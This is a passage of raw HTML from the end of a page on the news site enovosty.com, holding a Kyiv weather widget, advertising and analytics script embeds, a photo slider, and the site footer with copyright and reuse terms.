);}}</script> <br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/category/3/ " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <br><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><script>jQuery(document).ready(function($){$('#slider_gallery').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery div.anythingSlider-minimalist-round span.arrow{height:170px}</style><div class="topnews_single slide gallery" style="width: 258px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery"><li><ul class="tact"><li id="li0" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=558&pid=12156" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/suzhety/thumbs/thumbs_13.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Фото, словно скопированные с картин Возрождения"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=558&pid=12156" title="Фото, словно скопированные с картин Возрождения" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Фото, словно скопированные с картин Возрождения</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/teni/thumbs/thumbs_shadows08.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Художник, который рисует тенью"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" title="Художник, который рисует тенью" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Художник, который рисует тенью</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/eda_art/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Еда которая порадуют перфекциониста"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" title="Еда которая порадуют перфекциониста" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Еда которая порадуют перфекциониста</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=555&pid=12093" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/razrez/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Заглянуть внутрь! Предметы, которые разрезали напополам"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=555&pid=12093" title="Заглянуть внутрь! Предметы, которые разрезали напополам" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Заглянуть внутрь! Предметы, которые разрезали напополам</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4809741"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4809741","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "d41d145fab";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><div id="vid_vpaut_div" style="display:inline-block;width:400px;height:240px" vid_vpaut_pl="6160"></div><script type="text/javascript" src="https://videoroll.net/js/vid_vpaut_script.js" async></script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script></body></html>